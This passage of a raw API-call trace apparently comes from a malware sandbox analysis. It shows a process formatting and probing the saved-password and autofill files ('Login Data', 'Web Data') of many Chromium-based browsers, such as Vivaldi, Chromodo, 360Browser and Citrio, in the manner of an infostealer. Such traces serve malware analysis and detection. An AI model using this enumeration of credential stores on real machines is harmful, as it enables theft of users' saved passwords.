() returned 0x780000 [0312.764] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.765] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Login Data") returned 0 [0312.765] GetProcessHeap () returned 0x780000 [0312.765] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.765] GetProcessHeap () returned 0x780000 [0312.765] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.766] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.767] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 68 [0312.767] GetProcessHeap () returned 0x780000 [0312.767] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8c) returned 0x79c2a8 [0312.767] GetProcessHeap () returned 0x780000 [0312.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.768] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCocCoc\\Browser\\Default\\Login Data") returned 0 [0312.768] GetProcessHeap () returned 0x780000 [0312.769] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.769] GetProcessHeap () returned 0x780000 [0312.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.770] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.770] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 72 [0312.770] GetProcessHeap () returned 0x780000 [0312.770] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x94) returned 0x79c2c0 [0312.771] GetProcessHeap () returned 0x780000 [0312.771] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.772] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Login Data") returned 0 [0312.772] GetProcessHeap () returned 0x780000 [0312.773] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.773] GetProcessHeap () returned 0x780000 [0312.773] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.773] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.774] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 70 [0312.774] GetProcessHeap () returned 0x780000 [0312.774] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x90) returned 0x79c2b8 [0312.774] GetProcessHeap () returned 0x780000 [0312.775] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.776] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data\\Default\\Web Data") returned 0 [0312.776] GetProcessHeap () returned 0x780000 [0312.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.776] GetProcessHeap () returned 0x780000 [0312.776] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.783] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.784] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 53 [0312.784] GetProcessHeap () returned 0x780000 [0312.784] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x6e) returned 0x79c298 [0312.784] GetProcessHeap () returned 0x780000 [0312.785] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.785] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.785] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Login Data") returned 0 [0312.786] GetProcessHeap () returned 0x780000 [0312.786] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.786] GetProcessHeap () returned 0x780000 [0312.786] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.787] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.788] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 61 [0312.788] GetProcessHeap () returned 0x780000 [0312.788] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x79c2a8 [0312.788] GetProcessHeap () returned 0x780000 [0312.788] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.789] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalVivaldi\\Default\\Login Data") returned 0 [0312.789] GetProcessHeap () returned 0x780000 [0312.790] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.790] GetProcessHeap () returned 0x780000 [0312.790] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.790] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.791] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 80 [0312.791] GetProcessHeap () returned 0x780000 [0312.791] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa4) returned 0x79c2c0 [0312.791] GetProcessHeap () returned 0x780000 [0312.792] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.793] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Login Data") returned 0 [0312.793] GetProcessHeap () returned 0x780000 [0312.793] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.793] GetProcessHeap () returned 0x780000 [0312.793] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.794] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.794] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 78 [0312.794] GetProcessHeap () returned 0x780000 [0312.795] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78b048 [0312.795] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.796] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Chromodo\\User Data\\Default\\Web Data") returned 0 [0312.796] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b048 | out: hHeap=0x780000) returned 1 [0312.796] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.797] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.797] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 61 [0312.797] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x79c298 [0312.798] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.798] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Login Data") returned 0 [0312.799] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.799] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.799] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.800] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 69 [0312.800] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8e) returned 0x79c2a8 [0312.800] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.801] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.801] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Chromodo\\Default\\Login Data") returned 0 [0312.802] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.802] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.802] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.803] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 74 [0312.803] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x98) returned 0x79c2c0 [0312.803] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.804] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Login Data") returned 0 [0312.804] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.804] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.805] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.805] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 72 [0312.805] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x94) returned 0x79c2b8 [0312.806] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.807] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Superbird\\User Data\\Default\\Web Data") returned 0 [0312.807] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.807] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.808] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.809] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 55 [0312.809] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x72) returned 0x797c90 [0312.809] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.810] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.810] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Login Data") returned 0 [0312.811] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797c90 | out: hHeap=0x780000) returned 1 [0312.811] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.812] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.813] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 63 [0312.813] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x82) returned 0x79c2a8 [0312.813] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.815] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalSuperbird\\Default\\Login Data") returned 0 [0312.815] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.815] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.816] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.817] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 78 [0312.817] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78a280 [0312.817] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.818] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.818] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Login Data") returned 0 [0312.818] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a280 | out: hHeap=0x780000) returned 1 [0312.818] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.819] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.820] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 76 [0312.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x9c) returned 0x78a9b8 [0312.820] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.821] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data\\Default\\Web Data") returned 0 [0312.821] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a9b8 | out: hHeap=0x780000) returned 1 [0312.822] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.822] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.823] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 59 [0312.823] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7a) returned 0x79c298 [0312.823] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.830] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.830] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0312.831] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.831] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.831] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.832] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0312.832] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8a) returned 0x79c2a8 [0312.832] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.833] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0312.834] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.834] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.834] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.835] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0312.835] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa4) returned 0x79c2c0 [0312.835] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.836] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.836] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0312.836] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.837] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.837] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.838] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0312.838] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa0) returned 0x78a9b8 [0312.838] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.840] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.840] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0312.841] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78a9b8 | out: hHeap=0x780000) returned 1 [0312.841] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.842] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.842] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0312.843] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x79c298 [0312.843] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.844] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0312.845] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.845] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.845] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.846] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0312.846] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8e) returned 0x79c2a8 [0312.847] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.847] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.848] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0312.848] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.848] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.849] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.850] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0312.850] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xaa) returned 0x79c2c0 [0312.850] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.851] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.851] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0312.852] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.852] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.852] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.853] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0312.853] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xa6) returned 0x79c2b8 [0312.854] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.855] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.855] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0312.856] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.856] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.857] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.858] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0312.858] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x84) returned 0x79c298 [0312.858] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.859] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0312.860] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: hHeap=0x780000) returned 1 [0312.860] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6e) returned 0x798330 [0312.861] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.861] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0312.861] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x94) returned 0x79c2a8 [0312.862] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.863] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0312.864] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2a8 | out: hHeap=0x780000) returned 1 [0312.864] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f84) returned 0x798330 [0312.864] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.865] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0312.865] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xae) returned 0x79c2c0 [0312.866] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.867] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0312.867] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2c0 | out: hHeap=0x780000) returned 1 [0312.868] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f80) returned 0x798330 [0312.868] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.869] wvsprintfW (in: param_1=0x798330, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0312.869] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xaa) returned 0x79c2b8 [0312.869] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.874] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.875] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0312.875] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c2b8 | out: hHeap=0x780000) returned 1 [0312.875] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5e) returned 0x798330 [0312.876] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0312.877] wvsprintfW (in: param_1=0x798330, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0312.877] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x88) returned 0x79c298 [0312.877] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798330 | out: hHeap=0x780000) returned 1 [0312.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0312.878] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0312.879] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79c298 | out: 